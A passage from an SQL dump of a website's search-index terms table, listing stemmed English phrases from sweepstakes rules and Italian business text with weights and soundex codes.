any','valuat on any',0,1,1.5333,'V435',1,'en'),(29311,'value or','valu or',0,1,1.2667,'V460',1,'en'),(29312,'value or cash','valu or cash',0,1,1.4333,'V462',1,'en'),(29313,'value their','valu their',0,1,1.3667,'V436',1,'en'),(29314,'value their arv','valu their arv',0,1,1.5,'V4361',1,'en'),(29315,'viability','viabil',0,0,0.6,'V430',1,'en'),(29316,'viability of','viabil of',0,1,1.4,'V431',1,'en'),(29317,'viability of the','viabil of the',0,1,1.5333,'V4313',1,'en'),(29318,'victorious','victori',0,0,0.6667,'V2362',1,'en'),(29319,'victorious american','victori american',0,1,1.6333,'V23625625',1,'en'),(29320,'victorious american express','victori american express',0,1,1.9,'V236256252162',1,'en'),(29321,'violate','violat',0,0,0.4667,'V430',1,'en'),(29322,'violate the','violat the',0,1,1.3667,'V430',1,'en'),(29323,'violate the official','violat the official',0,1,1.6667,'V43124',1,'en'),(29324,'violation','violat',0,0,0.6,'V435',1,'en'),(29325,'violation of','violat of',0,1,1.4,'V4351',1,'en'),(29326,'violation of the','violat of the',0,1,1.5333,'V43513',1,'en'),(29327,'void','void',0,0,0.2667,'V300',1,'en'),(29328,'void the','void the',0,1,1.2667,'V300',1,'en'),(29329,'void the entries','void the entries',0,1,1.5333,'V35362',1,'en'),(29330,'void where','void where',0,1,1.3333,'V360',1,'en'),(29331,'void where restricted','void where restricted',0,1,1.7,'V3623623',1,'en'),(29332,'void wherever','void wherever',0,1,1.4333,'V3616',1,'en'),(29333,'void wherever disallowed','void wherever disallowed',0,1,1.8,'V36163243',1,'en'),(29334,'waive','waiv',0,0,0.3333,'W100',1,'en'),(29335,'waive any','waiv any',0,1,1.3,'W150',1,'en'),(29336,'waive any claim','waiv any claim',0,1,1.5,'W15245',1,'en'),(29337,'warranties','warranti',0,0,0.6667,'W6532',1,'en'),(29338,'warranties provided','warranti provided',0,1,1.6333,'W65321613',1,'en'),(29339,'warranties provided by','warranti provided by',0,1,1.7333,'W653216131',1,'en'),(29340,'warranty','warranti',0,0,0.5333,'W653',1,'en'),(29341,'warranty forum','warranti forum',0,1,1.4667,'W653165',1,'en'),(29342,'warranty forum alternative','warranti forum alternative',0,1,1.8667,'W653165436531',1,'en'),(29343,'warranty representations','warranti representations',0,1,1.8,'W65361625352',1,'en'),(29344,'warranty representations or','warranti representations or',0,1,1.9,'W653616253526',1,'en'),(29345,'was sent','wa sent',0,1,1.2667,'W253',1,'en'),(29346,'was sent or','wa sent or',0,1,1.3667,'W2536',1,'en'),(29347,'way as','wai as',0,1,1.2,'W200',1,'en'),(29348,'way as an','wai as an',0,1,1.3,'W250',1,'en'),(29349,'way for','wai for',0,1,1.2333,'W160',1,'en'),(29350,'way for by','wai for by',0,1,1.3333,'W161',1,'en'),(29351,'way with','wai with',0,1,1.2667,'W300',1,'en'),(29352,'way with the','wai with the',0,1,1.4,'W300',1,'en'),(29353,'we have','we have',0,1,1.2333,'W100',2,'en'),(29354,'we have a','we have a',0,1,1.3,'W100',1,'en'),(29355,'weather','weather',0,0,0.4667,'W360',1,'en'),(29356,'weather or','weather or',0,1,1.3333,'W360',1,'en'),(29357,'weather or other','weather or other',0,1,1.5333,'W3636',1,'en'),(29358,'web marketers','web marketers',0,1,1.4333,'W1562362',1,'en'),(29359,'web marketers male','web marketers male',0,1,1.6,'W156236254',1,'en'),(29360,'web sites','web sites',0,1,1.3,'W1232',1,'en'),(29361,'web sites loved','web sites loved',0,1,1.5,'W1232413',1,'en'),(29362,'web sites promoting','web sites promoting',0,1,1.6333,'W1232165352',1,'en'),(29363,'weeks','week',0,0,0.3333,'W200',1,'en'),(29364,'weeks a','week a',0,1,1.2333,'W200',1,'en'),(29365,'weeks a year','week a year',0,1,1.4,'W260',1,'en'),(29366,'well as to','well as to',0,1,1.3333,'W423',1,'en'),(29367,'well-being','well-b',0,0,0.6667,'W4152',1,'en'),(29368,'well-being 733','well-b 733',0,1,1.4667,'W4152',1,'en'),(29369,'well-being 733 third','well-b 733 third',0,1,1.6667,'W4152363',1,'en'),(29370,'where disallowed','where disallowed',0,1,1.5333,'W63243',1,'en'),(29371,'where disallowed all','where disallowed all',0,1,1.6667,'W632434',1,'en'),(29372,'where prohibited','where prohibited',0,1,1.5333,'W61613',1,'en'),(29373,'where prohibited or','where prohibited or',0,1,1.6333,'W616136',1,'en'),(29374,'where restricted','where restricted',0,1,1.5333,'W623623',1,'en'),(29375,'where restricted a','where restricted a',0,1,1.6,'W623623',1,'en'),(29376,'where they','where they',0,1,1.3333,'W630',1,'en'),(29377,'where they live','where they live',0,1,1.5,'W6341',1,'en'),(29378,'wherever','wherev',0,0,0.5333,'W616',1,'en'),(29379,'wherever disallowed','wherev disallowed',0,1,1.6333,'W6163243',1,'en'),(29380,'wherever disallowed by','wherev disallowed by',0,1,1.7333,'W61632431',1,'en'),(29381,'whether having','whether having',0,1,1.4667,'W36152',1,'en'),(29382,'whether having to','whether having to',0,1,1.5667,'W361523',1,'en'),(29383,'whether of','whether of',0,1,1.3333,'W361',1,'en'),(29384,'whether of the','whether of the',0,1,1.4667,'W3613',1,'en'),(29385,'which may','which may',0,1,1.3,'W250',2,'en'),(29386,'which may occur','which may occur',0,1,1.5,'W2526',1,'en'),(29387,'which would','which would',0,1,1.3667,'W243',1,'en'),(29388,'which would cause','which would cause',0,1,1.5667,'W2432',1,'en'),(29389,'who are','who are',0,1,1.2333,'W600',2,'en'),(29390,'who are 18','who are 18',0,1,1.3333,'W600',1,'en'),(29391,'who have committed','who have committed',0,1,1.6,'W1253',1,'en'),(29392,'who have within','who have within',0,1,1.5,'W135',1,'en'),(29393,'who share','who share',0,1,1.3,'W260',1,'en'),(29394,'who share the','who share the',0,1,1.4333,'W263',1,'en'),(29395,'whole illegible','whole illegible',0,1,1.5,'W4214',1,'en'),(29396,'whole illegible unintelligible','whole illegible unintelligible',0,1,2,'W4214534214',1,'en'),(29397,'whose','whose',1,0,0.0417,'W200',1,'en'),(29398,'whose activities','whose activities',0,1,1.5333,'W23132',1,'en'),(29399,'whose activities shall','whose activities shall',0,1,1.7333,'W231324',1,'en'),(29400,'whose preferences','whose preferences',0,1,1.5667,'W2161652',1,'en'),(29401,'whose preferences are','whose preferences are',0,1,1.7,'W21616526',1,'en'),(29402,'wide state','wide state',0,1,1.3333,'W323',1,'en'),(29403,'wide state and','wide state and',0,1,1.4667,'W32353',1,'en'),(29404,'will be awarded','will be awarded',0,1,1.5,'W4163',1,'en'),(29405,'will be disqualified','will be disqualified',0,1,1.6667,'W4132413',1,'en'),(29406,'will be forfeited','will be forfeited',0,1,1.5667,'W41613',1,'en'),(29407,'will be notified','will be notified',0,1,1.5333,'W415313',1,'en'),(29408,'will be sharing','will be sharing',0,1,1.5,'W412652',1,'en'),(29409,'will likely','will likely',0,1,1.3667,'W424',1,'en'),(29410,'will likely to','will likely to',0,1,1.4667,'W4243',1,'en'),(29411,'will not','will not',0,1,1.2667,'W453',2,'en'),(29412,'will not be','will not be',0,1,1.3667,'W4531',1,'en'),(29413,'will not improve','will not improve',0,1,1.5333,'W4535161',1,'en'),(29414,'will randomly','will randomly',0,1,1.4333,'W465354',1,'en'),(29415,'will randomly pick','will randomly pick',0,1,1.6,'W46535412',1,'en'),(29416,'will send','will send',0,1,1.3,'W4253',1,'en'),(29417,'will send to','will send to',0,1,1.4,'W4253',1,'en'),(29418,'will sign','will sign',0,1,1.3,'W425',1,'en'),(29419,'will sign are','will sign are',0,1,1.4333,'W4256',1,'en'),(29420,'win','win',0,0,0.2,'W500',4,'en'),(29421,'win the','win the',0,1,1.2333,'W530',3,'en'),(29422,'win the prize','win the prize',0,1,1.4333,'W53162',1,'en'),(29423,'win void','win void',0,1,1.2667,'W513',1,'en'),(29424,'win void where','win void where',0,1,1.4667,'W5136',1,'en'),(29425,'winner','winner',0,0,0.4,'W560',2,'en'),(29426,'winner about','winner about',0,1,1.4,'W5613',1,'en'),(29427,'winner about the','winner about the',0,1,1.5333,'W5613',1,'en'),(29428,'winner acceptance','winner acceptance',0,1,1.5667,'W5621352',1,'en'),(29429,'winner acceptance of','winner acceptance of',0,1,1.6667,'W56213521',1,'en'),(29430,'winner agree','winner agree',0,1,1.4,'W5626',1,'en'),(29431,'winner agree to','winner agree to',0,1,1.5,'W56263',1,'en'),(29432,'winner agreement','winner agreement',0,1,1.5333,'W562653',1,'en'),(29433,'winner agreement and','winner agreement and',0,1,1.6667,'W56265353',1,'en'),(29434,'winner agrees','winner agrees',0,1,1.4333,'W56262',1,'en'),(29435,'winner agrees that','winner agrees that',0,1,1.6,'W562623',1,'en'),(29436,'winner by','winner by',0,1,1.3,'W561',1,'en'),(29437,'winner by e','winner by e',0,1,1.3667,'W561',1,'en'),(29438,'winner cannot','winner cannot',0,1,1.4333,'W56253',1,'en'),(29439,'winner cannot or','winner cannot or',0,1,1.5333,'W562536',1,'en'),(29440,'winner fails','winner fails',0,1,1.4,'W56142',1,'en'),(29441,'winner fails to','winner fails to',0,1,1.5,'W561423',1,'en'),(29442,'winner full','winner full',0,1,1.3667,'W5614',1,'en'),(29443,'winner full name','winner full name',0,1,1.5333,'W56145',1,'en'),(29444,'winner has','winner has',0,1,1.3333,'W562',2,'en'),(29445,'winner has replied','winner has replied',0,1,1.6,'W5626143',1,'en'),(29446,'winner is','winner is',0,1,1.3,'W562',1,'en'),(29447,'winner is found','winner is found',0,1,1.5,'W562153',1,'en'),(29448,'winner may','winner may',0,1,1.3333,'W565',1,'en'),(29449,'winner may be','winner may be',0,1,1.4333,'W5651',1,'en'),(29450,'winner must','winner must',0,1,1.3667,'W56523',1,'en'),(29451,'winner must reply','winner must reply',0,1,1.5667,'W56523614',1,'en'),(29452,'winner nor','winner nor',0,1,1.3333,'W5656',1,'en'),(29453,'winner nor is','winner nor is',0,1,1.4333,'W56562',1,'en'),(29454,'winner notice','winner notice',0,1,1.4333,'W56532',1,'en'),(29455,'winner notice prospect','winner notice prospect',0,1,1.7333,'W56532162123',1,'en'),(29456,'winner prize','winner prize',0,1,1.4,'W56162',1,'en'),(29457,'winner prize notification','winner prize notification',0,1,1.8333,'W56162531235',1,'en'),(29458,'winner s','winner s',0,1,1.2667,'W562',1,'en'),(29459,'winner s a','winner s a',0,1,1.3333,'W562',1,'en'),(29460,'winner s cannot','winner s cannot',0,1,1.5,'W56253',1,'en'),(29461,'winner s from','winner s from',0,1,1.4333,'W562165',1,'en'),(29462,'winner s to','winner s to',0,1,1.3667,'W5623',1,'en'),(29463,'winner s will','winner s will',0,1,1.4333,'W5624',1,'en'),(29464,'winner selection','winner selection',0,1,1.5333,'W5624235',1,'en'),(29465,'winner selection is','winner selection is',0,1,1.6333,'W56242352',1,'en'),(29466,'winner shall','winner shall',0,1,1.4,'W5624',1,'en'),(29467,'winner shall be','winner shall be',0,1,1.5,'W56241',1,'en'),(29468,'winner to','winner to',0,1,1.3,'W563',1,'en'),(29469,'winner to accept','winner to accept',0,1,1.5333,'W563213',1,'en'),(29470,'winner will','winner will',0,1,1.3667,'W564',1,'en'),(29471,'winner will be','winner will be',0,1,1.4667,'W5641',1,'en'),(29472,'winner winner','winner winner',0,1,1.4333,'W5656',1,'en'),(29473,'winner winner will','winner winner will',0,1,1.6,'W56564',1,'en'),(29474,'winner\'s','winner',0,0,0.5333,'W562',1,'en'),(29475,'winner\'s accountability','winner accountability',0,1,1.7667,'W56253143',1,'en'),(29476,'winner\'s accountability including','winner accountability including',0,1,2,'W56253143524352',1,'en'),(29477,'winners','winner',0,0,0.4667,'W562',1,'en'),(29478,'winners acknowledge','winner acknowledge',0,1,1.6333,'W5625432',1,'en'),(29479,'winners acknowledge that','winner acknowledge that',0,1,1.8,'W56254323',1,'en'),(29480,'winners affidavit','winner affidavit',0,1,1.5667,'W5621313',1,'en'),(29481,'winners affidavit or','winner affidavit or',0,1,1.6667,'W56213136',1,'en'),(29482,'winning','win',0,0,0.4667,'W520',2,'en'),(29483,'winning depend','win depend',0,1,1.4667,'W523153',1,'en'),(29484,'winning depend on','win depend on',0,1,1.5667,'W5231535',1,'en'),(29485,'winning legal','win legal',0,1,1.4333,'W52424',1,'en'),(29486,'winning legal declare','win legal declare',0,1,1.7,'W524243246',1,'en'),(29487,'with all','with all',0,1,1.2667,'W340',1,'en'),(29488,'with all info','with all info',0,1,1.4333,'W3451',1,'en'),(29489,'with any','with any',0,1,1.2667,'W350',1,'en'),(29490,'with any prize','with any prize',0,1,1.4667,'W35162',1,'en'),(29491,'with any web','with any web',0,1,1.4,'W351',1,'en'),(29492,'with federal','with federal',0,1,1.4,'W31364',1,'en'),(29493,'with federal can','with federal can',0,1,1.5333,'W3136425',1,'en'),(29494,'with notarized','with notarized',0,1,1.4667,'W353623',1,'en'),(29495,'with notarized and','with notarized and',0,1,1.6,'W35362353',1,'en'),(29496,'with or','with or',0,1,1.2333,'W360',1,'en'),(29497,'with or not','with or not',0,1,1.3667,'W3653',1,'en'),(29498,'with or violate','with or violate',0,1,1.5,'W36143',1,'en'),(29499,'with respect','with respect',0,1,1.4,'W362123',1,'en'),(29500,'with respect to','with respect to',0,1,1.5,'W362123',1,'en'),(29501,'with sponsor','with sponsor',0,1,1.4,'W321526',1,'en'),(29502,'with sponsor information','with sponsor information',0,1,1.8,'W321526516535',1,'en'),(29503,'with the above','with the above',0,1,1.4667,'W310',1,'en'),(29504,'with the entry','with the entry',0,1,1.4667,'W3536',1,'en'),(29505,'with the exception','with the exception',0,1,1.6,'W32135',1,'en'),(29506,'with the software','with the software',0,1,1.5667,'W32136',1,'en'),(29507,'with the special','with the special',0,1,1.5333,'W32124',1,'en'),(29508,'with the state','with the state',0,1,1.4667,'W323',1,'en'),(29509,'with this sweepstakes','with this sweepstakes',0,1,1.7,'W321232',1,'en'),(29510,'within 1','within 1',0,1,1.2667,'W350',1,'en'),(29511,'within 1 year','within 1 year',0,1,1.4333,'W356',1,'en'),(29512,'within any','within any',0,1,1.3333,'W350',1,'en'),(29513,'within any of','within any of',0,1,1.4333,'W351',1,'en'),(29514,'within five','within five',0,1,1.3667,'W351',1,'en'),(29515,'within five 5','within five 5',0,1,1.4333,'W351',1,'en'),(29516,'within fourteen','within fourteen',0,1,1.5,'W351635',1,'en'),(29517,'within fourteen 14','within fourteen 14',0,1,1.6,'W351635',1,'en'),(29518,'within one','within one',0,1,1.3333,'W350',1,'en'),(29519,'within one year','within one year',0,1,1.5,'W356',1,'en'),(29520,'without further','without further',0,1,1.5,'W31636',1,'en'),(29521,'without further issue','without further issue',0,1,1.7,'W316362',1,'en'),(29522,'without further stops','without further stops',0,1,1.7,'W316362312',1,'en'),(29523,'without giving','without giving',0,1,1.4667,'W32152',1,'en'),(29524,'without giving effect','without giving effect',0,1,1.7,'W32152123',1,'en'),(29525,'without limitation','without limitation',0,1,1.6,'W34535',1,'en'),(29526,'without limitation home','without limitation home',0,1,1.7667,'W34535',1,'en'),(29527,'won\'t','won',0,0,0.3333,'W530',2,'en'),(29528,'won\'t be','won be',0,1,1.2667,'W531',1,'en'),(29529,'won\'t be substituted','won be substituted',0,1,1.6667,'W5312123',1,'en'),(29530,'work properly','work properly',0,1,1.4333,'W6216164',1,'en'),(29531,'work properly failures','work properly failures',0,1,1.7333,'W62161641462',1,'en'),(29532,'workforce','workforc',0,0,0.6,'W62162',1,'en'),(29533,'workforce officers','workforc officers',0,1,1.6,'W621621262',1,'en'),(29534,'workforce officers and','workforc officers and',0,1,1.7333,'W62162126253',1,'en'),(29535,'world-wide-web without','world-wide-web without',0,1,1.7333,'W64313',1,'en'),(29536,'world-wide-web without further','world-wide-web without further',0,1,2,'W643131636',1,'en'),(29537,'worldwide and','worldwid and',0,1,1.4333,'W64353',1,'en'),(29538,'worldwide and in','worldwid and in',0,1,1.5333,'W643535',1,'en'),(29539,'would cause','would cause',0,1,1.3667,'W432',1,'en'),(29540,'would cause use','would cause use',0,1,1.5,'W432',1,'en'),(29541,'would sign','would sign',0,1,1.3333,'W4325',1,'en'),(29542,'would sign have','would sign have',0,1,1.5,'W43251',1,'en'),(29543,'y potential','y potential',0,1,1.3667,'Y13534',1,'en'),(29544,'y potential winner','y potential winner',0,1,1.6,'Y1353456',1,'en'),(29545,'y simply','y simply',0,1,1.2667,'Y2514',1,'en'),(29546,'y simply entries','y simply entries',0,1,1.5333,'Y25145362',1,'en'),(29547,'yankee','yanke',0,0,0.4,'Y520',1,'en'),(29548,'yankee express','yanke express',0,1,1.4667,'Y52162',1,'en'),(29549,'yankee express company','yanke express company',0,1,1.7333,'Y52162515',1,'en'),(29550,'year of','year of',0,1,1.2333,'Y610',1,'en'),(29551,'year of receipt','year of receipt',0,1,1.5,'Y616213',1,'en'),(29552,'year replicated','year replicated',0,1,1.5,'Y61423',1,'en'),(29553,'year replicated by','year replicated by',0,1,1.6,'Y614231',1,'en'),(29554,'year whether','year whether',0,1,1.4,'Y636',1,'en'),(29555,'year whether having','year whether having',0,1,1.6333,'Y636152',1,'en'),(29556,'you can 2007','you can 2007',0,1,1.4,'Y250',1,'en'),(29557,'you have he','you have he',0,1,1.3667,'Y100',1,'en'),(29558,'you information','you information',0,1,1.5,'Y516535',1,'en'),(29559,'you information regarding','you information regarding',0,1,1.8333,'Y516535626352',1,'en'),(29560,'you must','you must',0,1,1.2667,'Y523',1,'en'),(29561,'you must fully','you must fully',0,1,1.4667,'Y52314',1,'en'),(29562,'you you','you you',0,1,1.2333,'Y000',2,'en'),(29563,'you you information','you you information',0,1,1.6333,'Y516535',1,'en'),(29564,'young','young',0,0,0.3333,'Y520',5,'en'),(29565,'young step','young step',0,1,1.3333,'Y5231',1,'en'),(29566,'young step little','young step little',0,1,1.5667,'Y5231434',1,'en'),(29567,'your email','your email',0,1,1.3333,'Y654',1,'en'),(29568,'your email add','your email add',0,1,1.4667,'Y6543',1,'en'),(29569,'your name','your name',0,1,1.3,'Y650',1,'en'),(29570,'your name program','your name program',0,1,1.5667,'Y6516265',1,'en'),(29571,'your odds','your odds',0,1,1.3,'Y632',1,'en'),(29572,'your odds of','your odds of',0,1,1.4,'Y6321',1,'en'),(29573,'your well-being','your well-being',0,1,1.5,'Y64152',1,'en'),(29574,'your well-being 733','your well-being 733',0,1,1.6333,'Y64152',1,'en'),(29575,'youthful young','youth young',0,1,1.4667,'Y31452',1,'en'),(29576,'youthful young step','youth young step',0,1,1.6333,'Y3145231',1,'en'),(29577,'yrs','yr',0,0,0.2,'Y620',1,'en'),(29578,'yrs old','yr old',0,1,1.2333,'Y6243',1,'en'),(29579,'yrs old or','yr old or',0,1,1.3333,'Y62436',1,'en'),(29580,'\'s 10','s 10',0,1,1.1667,'S000',1,'en'),(29581,'\'s 10 ma','s 10 ma',0,1,1.2667,'S500',1,'en'),(29582,'+13','+13',0,0,0.3,'',1,'en'),(29583,'+13 delete','+13 delete',0,1,1.3333,'D430',1,'en'),(29584,'+13 delete 2006','+13 delete 2006',0,1,1.5,'D430',1,'en'),(29585,'10 ma','10 ma',0,1,1.1667,'M000',1,'en'),(29586,'10 ma penso','10 ma penso',0,1,1.3667,'M152',1,'en'),(29587,'120 milioni','120 milioni',0,1,1.3667,'M450',1,'en'),(29588,'120 milioni di','120 milioni di',0,1,1.4667,'M453',1,'en'),(29589,'128','128',0,0,0.3,'',1,'en'),(29590,'13 senza','13 senza',0,1,1.2667,'S520',1,'en'),(29591,'13 senza particolari','13 senza particolari',0,1,1.6667,'S52163246',1,'en'),(29592,'130 milioni','130 milioni',0,1,1.3667,'M450',1,'en'),(29593,'130 milioni ora','130 milioni ora',0,1,1.5,'M456',1,'en'),(29594,'2.500','2.500',0,0,0.5,'',1,'en'),(29595,'2.500 persone','2.500 persone',0,1,1.4333,'P625',1,'en'),(29596,'2.500 persone ed','2.500 persone ed',0,1,1.5333,'P6253',1,'en'),(29597,'20 della','20 della',0,1,1.2667,'D400',1,'en'),(29598,'20 della nostra','20 della nostra',0,1,1.5,'D45236',1,'en'),(29599,'2006','2006',0,0,0.4,'',1,'en'),(29600,'2006 è','2006 è',0,1,1.2,'è000',1,'en'),(29601,'2006 è un','2006 è un',0,1,1.3,'è500',1,'en'),(29602,'2006 siamo','2006 siamo',0,1,1.3333,'S500',1,'en'),(29603,'2006 siamo cresciuti','2006 siamo cresciuti',0,1,1.6667,'S52623',1,'en'),(29604,'3 miliardi','3 miliardi',0,1,1.3333,'M463',1,'en'),(29605,'3 miliardi l\'','3 miliardi l',0,1,1.4333,'M4634',1,'en'),(29606,'30 dollari','30 dollari',0,1,1.3333,'D460',1,'en'),(29607,'30 dollari ma','30 dollari ma',0,1,1.4333,'D465',1,'en'),(29608,'4 3','4 3',0,1,1.1,'',1,'en'),(29609,'4 3 miliardi','4 3 miliardi',0,1,1.4,'M463',1,'en'),(29610,'4 7','4 7',0,1,1.1,'',1,'en'),(29611,'4 7 i','4 7 i',0,1,1.1667,'I000',1,'en'),(29612,'5 miliardi','5 miliardi',0,1,1.3333,'M463',1,'en'),(29613,'5 miliardi as','5 miliardi as',0,1,1.4333,'M4632',1,'en'),(29614,'5 miliardi di','5 miliardi di',0,1,1.4333,'M463',1,'en'),(29615,'5 miliardi dobbiamo','5 miliardi dobbiamo',0,1,1.6333,'M46315',1,'en'),(29616,'5 miliardi ingl\'','5 miliardi ingl',0,1,1.5333,'M463524',1,'en'),(29617,'50','50',0,0,0.2,'',3,'en'),(29618,'50 anni','50 anni',0,1,1.2333,'A500',1,'en'),(29619,'50 anni il','50 anni il',0,1,1.3333,'A540',1,'en'),(29620,'65','65',0,0,0.2,'',1,'en'),(29621,'65 delete','65 delete',0,1,1.3,'D430',1,'en'),(29622,'65 delete giro','65 delete giro',0,1,1.4667,'D4326',1,'en'),(29623,'7 i','7 i',0,1,1.1,'I000',1,'en'),(29624,'7 i quatst\'','7 i quatst',0,1,1.3667,'I2323',1,'en'),(29625,'85 degli','85 degli',0,1,1.2667,'D240',1,'en'),(29626,'85 degli occhiali','85 degli occhiali',0,1,1.5667,'D2424',1,'en'),(29627,'90','90',0,0,0.2,'',1,'en'),(29628,'90 mercato','90 mercato',0,1,1.3333,'M623',1,'en'),(29629,'90 mercato gna','90 mercato gna',0,1,1.4667,'M62325',1,'en'),(29630,'a cui','a cui',0,1,1.1667,'A200',1,'en'),(29631,'a cui guardare','a cui guardare',0,1,1.4667,'A2636',1,'en'),(29632,'a esclusiva','a esclusiva',0,1,1.3667,'A2421',1,'en'),(29633,'a esclusiva a','a esclusiva a',0,1,1.4333,'A2421',1,'en'),(29634,'a farlo','a farlo',0,1,1.2333,'A164',1,'en'),(29635,'a farlo regarding','a farlo regarding',0,1,1.5667,'A164626352',1,'en'),(29636,'a marzo','a marzo',0,1,1.2333,'A562',1,'en'),(29637,'a marzo la','a marzo la',0,1,1.3333,'A5624',1,'en'),(29638,'a rcs','a rcs',0,1,1.1667,'A620',1,'en'),(29639,'a rcs e','a rcs e',0,1,1.2333,'A620',1,'en'),(29640,'a somewhat','a somewhat',0,1,1.3333,'A253',1,'en'),(29641,'a somewhat riconosce','a somewhat riconosce',0,1,1.6667,'A2536252',1,'en'),(29642,'a ticket','a ticket',0,1,1.2667,'A323',1,'en'),(29643,'a ticket grandi','a ticket grandi',0,1,1.5,'A3232653',1,'en'),(29644,'a una','a una',0,1,1.1667,'A500',1,'en'),(29645,'a una nuova','a una nuova',0,1,1.3667,'A510',1,'en'),(29646,'a vedere','a vedere',0,1,1.2667,'A136',1,'en'),(29647,'a vedere oggi','a vedere oggi',0,1,1.4333,'A1362',1,'en'),(29648,'abbiamo','abbiamo',0,0,0.4667,'A150',1,'en'),(29649,'abbiamo aggiunto','abbiamo aggiunto',0,1,1.5333,'A15253',1,'en'),(29650,'abbiamo aggiunto anche','abbiamo aggiunto anche',0,1,1.7333,'A1525352',1,'en'),(29651,'abbiamo altre','abbiamo altre',0,1,1.4333,'A15436',1,'en'),(29652,'abbiamo altre piccole','abbiamo altre piccole',0,1,1.7,'A15436124',1,'en'),(29653,'abbiamo complessivamente','abbiamo complessivamente',0,1,1.8,'A1525142153',1,'en'),(29654,'abbiamo complessivamente 2.500','abbiamo complessivamente 2.500',0,1,2,'A1525142153',1,'en'),(29655,'abbiamo di','abbiamo di',0,1,1.3333,'A153',1,'en'),(29656,'abbiamo di frequenti','abbiamo di frequenti',0,1,1.6667,'A15316253',1,'en'),(29657,'abbiamo fatto','abbiamo fatto',0,1,1.4333,'A1513',1,'en'),(29658,'abbiamo fatto sforzi','abbiamo fatto sforzi',0,1,1.6667,'A15132162',1,'en'),(29659,'abbiamo in','abbiamo in',0,1,1.3333,'A150',1,'en'),(29660,'abbiamo in mente','abbiamo in mente',0,1,1.5333,'A153',1,'en'),(29661,'abbiamo lanciato','abbiamo lanciato',0,1,1.5333,'A154523',1,'en'),(29662,'abbiamo lanciato un\'','abbiamo lanciato un',0,1,1.6667,'A1545235',1,'en'),(29663,'abbiamo potuto','abbiamo potuto',0,1,1.4667,'A1513',1,'en'),(29664,'abbiamo potuto andarci','abbiamo potuto andarci',0,1,1.7333,'A15135362',1,'en'),(29665,'abbiamo stretto','abbiamo stretto',0,1,1.5,'A152363',1,'en'),(29666,'abbiamo stretto l\'','abbiamo stretto l',0,1,1.6,'A1523634',1,'en'),(29667,'abbiamo tante','abbiamo tante',0,1,1.4333,'A15353',1,'en'),(29668,'abbiamo tante opportunità','abbiamo tante opportunità',0,1,1.8333,'A1535316353',1,'en'),(29669,'abbiamo una','abbiamo una',0,1,1.3667,'A150',1,'en'),(29670,'abbiamo una dimensione','abbiamo una dimensione',0,1,1.7333,'A153525',1,'en'),(29671,'abbiamo una scala','abbiamo una scala',0,1,1.5667,'A1524',1,'en'),(29672,'abbondantemente','abbondantement',0,0,1,'A1535353',1,'en'),(29673,'abbondantemente sopra','abbondantement sopra',0,1,1.7,'A1535353216',1,'en'),(29674,'abbondantemente sopra il','abbondantement sopra il',0,1,1.8,'A15353532164',1,'en'),(29675,'accanto','accanto',0,0,0.4667,'A253',1,'en'),(29676,'accanto alla','accanto alla',0,1,1.4,'A2534',1,'en'),(29677,'accanto alla capacità','accanto alla capacità',0,1,1.7,'A25342123',1,'en'),(29678,'accessori','accessori',0,0,0.6,'A260',1,'en'),(29679,'accessori firmati','accessori firmati',0,1,1.5667,'A261653',1,'en'),(29680,'accessori firmati for','accessori firmati for',0,1,1.7,'A26165316',1,'en'),(29681,'accogliere','accoglier',0,0,0.6667,'A246',1,'en'),(29682,'accogliere marchi','accoglier marchi',0,1,1.5667,'A246562',1,'en'),(29683,'accogliere marchi throughout','accoglier marchi throughout',0,1,1.9333,'A2465623623',1,'en'),(29684,'accordo','accordo',0,0,0.4667,'A263',1,'en'),(29685,'accordo minus','accordo minus',0,1,1.4333,'A26352',1,'en'),(29686,'accordo minus tiffany','accordo minus tiffany',0,1,1.7,'A26352315',1,'en'),(29687,'acquisizioni','acquisizioni',0,0,0.8,'A250',1,'en'),(29688,'acquisizioni abbiamo','acquisizioni abbiamo',0,1,1.6667,'A2515',1,'en'),(29689,'acquisizioni abbiamo aggiunto','acquisizioni abbiamo aggiunto',0,1,1.9667,'A2515253',1,'en'),(29690,'acquisizioni di','acquisizioni di',0,1,1.5,'A253',1,'en'),(29691,'acquisizioni di accogliere','acquisizioni di accogliere',0,1,1.8667,'A253246',1,'en'),(29692,'acquisizioni di sale','acquisizioni di sale',0,1,1.6667,'A25324',1,'en'),(29693,'acquisizioni with','acquisizioni with',0,1,1.5667,'A253',1,'en'),(29694,'acquisizioni with regard','acquisizioni with regard',0,1,1.8,'A2536263',1,'en'),(29695,'acquistare','acquistar',0,0,0.6667,'A236',1,'en'),(29696,'acquistare un','acquistar un',0,1,1.4333,'A2365',1,'en'),(29697,'acquistare un ulteriore','acquistar un ulteriore',0,1,1.7667,'A2365436',1,'en'),(29698,'affari','affari',0,0,0.4,'A160',1,'en'),(29699,'affari delete','affari delete',0,1,1.4333,'A16343',1,'en'),(29700,'affari delete nostro','affari delete nostro',0,1,1.6667,'A163435236',1,'en'),(29701,'aggiunge','aggiung',0,0,0.5333,'A252',1,'en'),(29702,'aggiunge gna','aggiung gna',0,1,1.4,'A2525',1,'en'),(29703,'aggiunge gna stiamo','aggiung gna stiamo',0,1,1.6333,'A2525235',1,'en'),(29704,'aggiunto','aggiunto',0,0,0.5333,'A253',1,'en'),(29705,'aggiunto anche','aggiunto anche',0,1,1.4667,'A25352',1,'en'),(29706,'aggiunto anche una','aggiunto anche una',0,1,1.6,'A253525',1,'en'),(29707,'aggiunto non','aggiunto non',0,1,1.4,'A2535',1,'en'),(29708,'aggiunto non by','aggiunto non by',0,1,1.5,'A25351',1,'en'),(29709,'agili','agili',0,0,0.3333,'A240',1,'en'),(29710,'agili e','agili e',0,1,1.2333,'A240',1,'en'),(29711,'agili e veloci','agili e veloci',0,1,1.4667,'A24142',1,'en'),(29712,'ai 30','ai 30',0,1,1.1667,'A000',1,'en'),(29713,'ai 30 dollari','ai 30 dollari',0,1,1.4333,'A346',1,'en'),(29714,'air travel','air travel',0,1,1.3333,'A63614',1,'en'),(29715,'air travel esperienza','air travel esperienza',0,1,1.7,'A6361421652',1,'en'),(29716,'al easy','al easy',0,1,1.2333,'A420',1,'en'),(29717,'al easy e','al easy e',0,1,1.3,'A420',1,'en'),(29718,'al lancio','al lancio',0,1,1.3,'A452',1,'en'),(29719,'al lancio di','al lancio di',0,1,1.4,'A4523',1,'en'),(29720,'al mondo','al mondo',0,1,1.2667,'A453',1,'en'),(29721,'al mondo for','al mondo for',0,1,1.4,'A45316',1,'en'),(29722,'alcuna','alcuna',0,0,0.4,'A425',1,'en'),(29723,'alcuna diversificazione','alcuna diversificazione',0,1,1.7667,'A4253162125',1,'en'),(29724,'alcuna diversificazione di','alcuna diversificazione 